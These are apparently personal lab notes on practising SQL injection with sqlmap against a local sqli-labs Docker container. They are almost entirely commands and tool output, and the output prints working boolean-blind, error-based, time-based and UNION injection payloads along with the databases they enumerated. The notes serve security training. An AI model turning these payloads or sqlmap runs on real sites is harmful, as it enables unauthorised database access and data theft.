sqlmap实验笔记

1

  docker run -dt --name sqli-labs -p 8090:8090 tavenli/sqli-labs

1

  python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --batch

1

  python ./sqlmap.py -u "http://127.0.0.1:8090/Less-1/?id=056zhn" --batch

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9075=9075 AND 'Aobx'='Aobx

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT (ELT(5512=5512,1))),0x716a787a71),5512) AND 'bXzR'='bXzR

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5909 FROM (SELECT(SLEEP(5)))bSoI) AND 'hYrh'='hYrh

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8543' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x4f7670415052735950636c594d5545537058787a675a78664367717569524f564565444a52524a55,0x716a787a71)-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0, PHP 5.5.38
back-end DBMS: MySQL >= 5.6

1

  python ./sqlmap.py -u "http://127.0.0.1:8090/Less-11/?id=1" --data="uname=056zhn&passwd=123&submit=Submit" --batch --dbs

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=12' OR NOT 1957=1957#&passwd=123&submit=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=12' AND GTID_SUBSET(CONCAT(0x71766b7871,(SELECT (ELT(4417=4417,1))),0x717a707171),4417)-- SJLv&passwd=123&submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=12' AND (SELECT 9333 FROM (SELECT(SLEEP(5)))king)-- QsIp&passwd=123&submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: uname=12' UNION ALL SELECT NULL,CONCAT(0x71766b7871,0x6e5573725368617774744c4e4e48764242796b7876424b4269746e5a72665a5359584b4851587948,0x717a707171)#&passwd=123&submit=Submit
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0, PHP 5.5.38
back-end DBMS: MySQL >= 5.6
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] sys

1

   java -jar ./burpsuite_community_v2022.3.9.jar

1

  python ./sqlmap.py -l /home/056zhn/log.txt --batch --dbs